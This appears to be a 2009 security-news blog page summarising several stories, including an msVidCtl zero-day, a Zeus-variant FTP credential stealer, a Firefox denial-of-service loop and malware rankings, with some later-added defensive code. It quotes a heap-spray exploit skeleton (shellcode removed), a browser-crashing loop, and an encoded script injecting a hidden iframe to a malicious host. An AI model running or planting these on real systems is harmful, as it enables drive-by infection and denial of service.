Jul 30

Andy Greenberg, Forbes.com

If you receive a text message on your iPhone any time after Thursday afternoon containing only a single square character, Charlie Miller would suggest you turn the device off. Quickly.

That small cipher will likely be your only warning that someone has taken advantage of a bug that Miller and his fellow cybersecurity researcher Collin Mulliner plan to publicize Thursday at the Black Hat cybersecurity conference in Las Vegas. Using a flaw they’ve found in the iPhone’s handling of text messages, the researchers say they’ll demonstrate how to send a series of mostly invisible SMS bursts that can give a hacker complete power over any of the smart phone’s functions. That includes dialing the phone, visiting Web sites, turning on the device’s camera and microphone and, most importantly, sending more text messages to further propagate a mass-gadget hijacking.

Ref: http://in.news.yahoo.com/240/20090729/1318/ttc-6711345.html

Jul 28

Regards to RSnake

He was playing around with Firefox today and accidentally found a super tiny DoS for Firefox that reminded him of his childhood. Remember that math puzzle where you put one penny on one square and then two on the next and four on the next and so on? Clearly that would amount to more money than you could realistically have when you really think it through, but kids have a hard time wrapping their heads around it. This is sort of similar, except it’s not logarithmic, it’s geometric, which made it surprising that it caused Firefox so much pain. He had just assumed the JS engine in Firefox would have said that it’s running too tight a loop and thrown the “running too slow” prompt at worst – or just finished at best, since it doesn’t look all that complicated:


var a;
for (var i = 0; i < 65536; i++) {
  // every iteration writes the whole accumulated string again, not just the new character
  document.write(a += String.fromCharCode(i));
}

I let this run for 10 minutes on a decent sized test machine and it never finished – I had to kill the process. Yeah, I know there are a million ways to DoS browsers, this one was just surprising.
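An added example (my code, not RSnake's) that measures why the loop hurts without rendering anything: document.write is replaced by a counting sink, so the volume handed to the page can be computed for the full 65536 iterations. The loop is linear, but because each iteration rewrites the whole accumulated string the output is quadratic, about 2.1 billion characters.

```javascript
// Added example, not from the original post. Models the loop's output volume
// with a counting sink in place of document.write, so it is safe to run.
// Each iteration writes the *whole* accumulated string, so the characters
// handed to the renderer grow quadratically in the iteration count even
// though the loop itself only runs n times.
function charsWrittenByAccumulatingLoop(n) {
  let a = "";   // the original's `var a;` starts undefined, which only prepends
                // a constant "undefined"; omitted here to keep the arithmetic clean
  let total = 0;
  const sink = (s) => { total += s.length; };   // stand-in for document.write
  for (let i = 0; i < n; i++) {
    sink(a += String.fromCharCode(i));          // same statement as the DoS
  }
  return total;
}

// The same content produced once, after the loop: linear in n.
function charsWrittenByWriteOnce(n) {
  let a = "";
  for (let i = 0; i < n; i++) a += String.fromCharCode(i);
  return a.length;
}

// Closed form for the accumulating version: 1 + 2 + ... + n = n(n+1)/2.
function expectedQuadratic(n) {
  return (n * (n + 1)) / 2;
}

const N = 65536;
console.log(charsWrittenByAccumulatingLoop(N)); // 2147516416 (~2.1 billion chars)
console.log(charsWrittenByWriteOnce(N));        // 65536
```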

Jul 26

I was forced to put this on the blog because I wanted readers to know how far Kido (aka Conficker) has gone.

As in previous months, this malware rating is compiled from data generated by the Kaspersky Security Network (KSN). However, slightly different methods have been used to select and analyze the data.

As before, two Top Twenties have been compiled from the data generated by KSN.

The first Top Twenty lists malicious programs, adware and potentially unwanted programs that were detected and neutralized when accessed for the first time, i.e. by using the on-access scanner. Using on-access statistics makes it possible to analyze the most recent, most dangerous and most widespread malicious programs that were blocked when launched on users’ computers or when downloaded from the Internet.

Position  Name                                  Number of infected computers
1         Net-Worm.Win32.Kido.ih                58200
2         Virus.Win32.Sality.aa                 28758
3         Trojan-Dropper.Win32.Flystud.ko       13064
4         Trojan-Downloader.Win32.VB.eql        12395
5         Worm.Win32.AutoRun.dui                 8934
6         Trojan.Win32.Autoit.ci                 8662
7         Virus.Win32.Virut.ce                   6197
8         Worm.Win32.Mabezat.b                   5967
9         Net-Worm.Win32.Kido.jq                 5934
10        Virus.Win32.Sality.z                   5750
11        Trojan-Downloader.JS.LuckySploit.q     4624
12        Virus.Win32.Alman.b                    4394
13        Packed.Win32.Black.a                   4317
14        Net-Worm.Win32.Kido.ix                 4284
15        Worm.Win32.AutoIt.i                    4189
16        Trojan-Downloader.WMA.GetCodec.u       4064
17        Packed.Win32.Klone.bj                  3882
18        Email-Worm.Win32.Brontok.q             3794
19        Worm.Win32.AutoRun.rxx                 3677
20        not-a-virus:AdWare.Win32.Shopper.v     3430

Even though the way in which threats were analyzed changed, this had no influence on the leaders in this ranking: Net-Worm.Win32.Kido.ih remained in first place. Two more modifications of the worm – Kido.jq and Kido.ix – also appeared in the rating. This Kido crop is due to the fact that this family of malware can also spread in varied ways, including via removable media which are then connected to unprotected computers.

Two worms from the AutoRun family, AutoRun.dui and AutoRun.rxx, also made it into the ranking by dint of the same method.

In detail: Virus list

Jul 16

The Nmap team is proud to announce the release of Nmap 5.00. This is the first major release since 4.50 in 2007, and includes about 600 significant changes since then! They consider this the most important Nmap release since 1997. There are too many changes to list them all here, so here are the top 5 improvements in Nmap 5:

1) The new Ncat tool aims to be your Swiss Army Knife for data transfer, redirection, and debugging. They released a whole users’ guide (http://nmap.org/ncat/guide/index.html) detailing security testing and network administration tasks made easy with Ncat. Details: http://nmap.org/5/#changes-ncat.

2) The addition of the Ndiff scan comparison tool completes Nmap’s growth into a whole suite of applications which work together to serve network administrators and security practitioners.

3) Nmap performance has improved dramatically. They spent last summer scanning much of the Internet and merging that data with internal enterprise scan logs to determine the most commonly open ports. This allows Nmap to scan fewer ports by default while finding more open ports.

4) They released Nmap Network Scanning, the official Nmap guide to network discovery and security scanning. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book suits all levels of security and networking professionals.

5) The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap. All existing scripts have been improved, and 32 new ones added.

To learn about even more changes, see the full release notes here:
http://nmap.org/5/

The Nmap 5.00 source code and Linux, Mac, and Windows packages are
available for download at the usual place:
http://nmap.org/download.html

Jul 16


The Offensive Security team, along with several active community members, have been working diligently to bring you an in-depth course on the Metasploit Framework: “Mastering the Framework”. This course will take you on a journey through the Metasploit Framework in full detail, and will include the latest MSF features such as:

  • Advanced Information gathering
  • Social Engineering attacks
  • Advanced port scanning
  • Writing your own MSF plugins
  • Auxiliary modules kung fu
  • Vulnerability Scanner Integration
  • Writing simple MSF fuzzers
  • Pivoting, Tunneling
  • Exploit Development
  • Egghunter mixins
  • Mastering MSF Payloads
  • Post Exploitation techniques
  • Practical Fast Track Usage
  • MSF Backdoors
  • Advanced AV avoidance
  • Much more!

Full details here:

http://www.offensive-security.com/blog/offsec/metasploit-unleashed-mastering-the-framework/

Jul 7

A fresh 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please update your AV signatures and keep an eye on IDS / IPS to minimize the attack vector as early as possible, as this exploit is likely to be widely deployed now that the code is available.

A valid workaround for the attack vector is available which sets the kill bit on the vulnerable DLL:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
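Applying the .reg file is only half the job; you also want to verify the kill bit actually landed. The following is an added example (my code, not from the post or the CSIS write-up) that parses exported registry text such as the fragment above or the output of reg export on a workstation, and confirms that bit 0x400 of Compatibility Flags is set under the msVidCtl CLSID.

```javascript
// Added example, not from the original post. Audits exported registry text to
// confirm the kill bit (bit 0x400 of "Compatibility Flags") is set for the
// vulnerable msVidCtl control's CLSID under the ActiveX Compatibility key.
const MSVIDCTL_CLSID = "{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}";
const KILL_BIT = 0x400;

// Minimal .reg parser. Pass the file contents as a string (real .reg exports are
// usually UTF-16LE, decode first). Returns Map<keyPath, Map<valueName, value>>;
// only dword: and "string" values are understood, other types are skipped.
function parseRegText(text) {
  const keys = new Map();
  let current = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line.startsWith("[") && line.endsWith("]")) {
      current = new Map();
      keys.set(line.slice(1, -1).toLowerCase(), current);
    } else if (current && line.startsWith('"')) {
      const m = /^"((?:[^"\\]|\\.)*)"=(.*)$/.exec(line);
      if (!m) continue;
      const [, name, val] = m;
      const dw = /^dword:([0-9a-f]{1,8})$/i.exec(val);
      if (dw) current.set(name, parseInt(dw[1], 16));
      else if (val.startsWith('"') && val.endsWith('"')) current.set(name, val.slice(1, -1));
    }
  }
  return keys;
}

// True only if the CLSID's key exists and Compatibility Flags has bit 0x400 set.
function killBitSet(regText, clsid = MSVIDCTL_CLSID) {
  const keyPath = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\" +
                   "ActiveX Compatibility\\" + clsid).toLowerCase();
  const values = parseRegText(regText).get(keyPath);
  if (!values) return false;
  const flags = values.get("Compatibility Flags");
  return typeof flags === "number" && (flags & KILL_BIT) !== 0;
}

// The workaround from the post, embedded as a string so the check runs stand-alone.
const WORKAROUND_REG = [
  "Windows Registry Editor Version 5.00",
  "",
  "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\" +
    MSVIDCTL_CLSID + "]",
  '"Compatibility Flags"=dword:00000400',
].join("\r\n");

console.log(killBitSet(WORKAROUND_REG)); // true
```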

Details of the exploit are available on the CSIS web site, but are included below:
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
[SHELL CODE REMOVED]  (the omitted part defines dashell)
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Microsoft has released an advisory for the exploit; it can be found here:
http://www.microsoft.com/technet/security/advisory/972890.mspx

Jul 5

http://www.bing-vs-google.com/
Have fun and analyse it.

Jul 5

If you have been watching the Microsoft security bulletins lately, then you’ve likely noticed yesterday’s bulletin, MS08-067. This is a particularly nasty bug, as it doesn’t require authentication to exploit in the default configuration for Windows Server 2003 and earlier systems (assuming that an attacker can talk over port 139 or port 445 to your box).

The usual mitigation for this particular vulnerability is to block off TCP/139 (NetBIOS) and TCP/445 (Direct hosted SMB), thus cutting off remote access to the srvsvc pipe, a prerequisite for exploiting the vulnerability in question.

The first stop for gaining more information about the bug in question would be the Microsoft advisory. As usual, however, the bulletin released for the MS08-067 issue was lacking in sufficiently detailed technical information as required to fully understand the flaw in question to the degree necessary down to the level of what functions were patched, aside from the fact that the vulnerability resided somewhere in netapi32.dll (the Microsoft rationale behind this policy is that providing that level of technical detail would simply aid the creation of exploits). However, as Pusscat presented at Blue Hat Fall ‘07, reverse engineering most present-day Microsoft security patches is not particularly insurmountable.
In detail

Jul 1

On Wednesday the 24th of June, 2009 Prevx detected a new Trojan that is harvesting FTP details from compromised machines. The list of compromised machines is vast, we have seen 66,000 unique FTP server logins from unique domains rising to 74,000 by Friday. The list is now so large we have no way to effectively inform companies in a meaningful timeframe.
What is the severity of this infection?

We rate this infection as CRITICAL. The infection has a ‘china syndrome’ potential. It includes a cyclic infection which leverages infected PCs to programmatically modify hi-volume web sites to infect additional users who become part of the cycle. More users leads to more discovery of web site admin credentials which in turn leads to more web sites being modified to serve the infection which leads to more infected users.

What is the infection vector?
The malware infects users that visit a compromised website using various exploit kits such as ‘unique pack’. The compromised web pages contain an injected script that looks something like the example below:
var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');
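The injected loader is just a percent-encoded string, so a responder can see what it adds to the page without executing it. Below is an added example (my code, not from the Prevx write-up) that implements the %XX / %uXXXX decoding that unescape() performs, pulls the argument out of the injected statement, and reports the hidden iframe's target and size; the same decoder handles the %u9090 sleds used by the msVidCtl exploit earlier on this page.

```javascript
// Added example, not from the original post. Decodes an injected
// unescape('...') loader and describes the iframe it writes into the page.

// %XX and %uXXXX decoding, as unescape() does it, without calling the legacy global.
function decodeJsEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi, (_, u, x) =>
    String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// Find every unescape('...') / unescape("...") argument in a script and decode it.
function decodeUnescapeCalls(script) {
  const out = [];
  const re = /unescape\(\s*(['"])((?:(?!\1).)*)\1\s*\)/g;
  let m;
  while ((m = re.exec(script)) !== null) out.push(decodeJsEscapes(m[2]));
  return out;
}

// Parse a decoded <iframe ...> tag into its attributes and flag 1x1-style sizing.
function describeIframe(html) {
  const tag = /<iframe\b([^>]*)>/i.exec(html);
  if (!tag) return null;
  const attrs = {};
  const attrRe = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  let a;
  while ((a = attrRe.exec(tag[1])) !== null) {
    attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];   // quoted or bare value
  }
  const tiny = (v) => v !== undefined && Number(v) <= 1;
  return { src: attrs.src, width: attrs.width, height: attrs.height,
           hidden: tiny(attrs.width) && tiny(attrs.height) };
}

function analyseInjection(script) {
  return decodeUnescapeCalls(script).map(describeIframe).filter(Boolean);
}

// The injected statement quoted in the write-up above (copied from the page, not constructed).
const INJECTED = "var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');";

console.log(analyseInjection(INJECTED));
// [ { src: 'http://stopssse.info/l.php?bse', width: '1', height: '1', hidden: true } ]
```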

What does the malware do ?

Once installed, the malware, which is a variant of the Zeus family, scours the machine’s stored form cache looking for stored FTP login credentials; once such logins are found it uses HTTP_POST to send this data to a server located in the Cayman Islands. Additionally, there is another component used, which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using the domain goooodbill.cn. This script gives the infected client a URL in the format USERNAME:PASSWORD@FTP.ADDRESS.COM; the client then logs in to the given FTP site, modifies all index pages (asp, php, html) and injects the script. Once injected, all visitors of the modified domain potentially become part of the infection network/cycle.

Jul 1

Even after his death, they don’t leave his name alone; it is constantly being used by sneaky people to get into the limelight, this time by malware kiddies. Try not to be lured in by “information” about his death; whatever the truth might be, you can see it on the news channels.

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

[Image: MJ X-Files web content]

Anyone taking the standard precautions shouldn’t have difficulty avoiding this one — just make sure JavaScript is disabled by default (so you don’t get infected by Mal/ObfJS-BP as found in the 1x1 iframe — it tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?) and get infected with Troj/ZBot-GJ.
more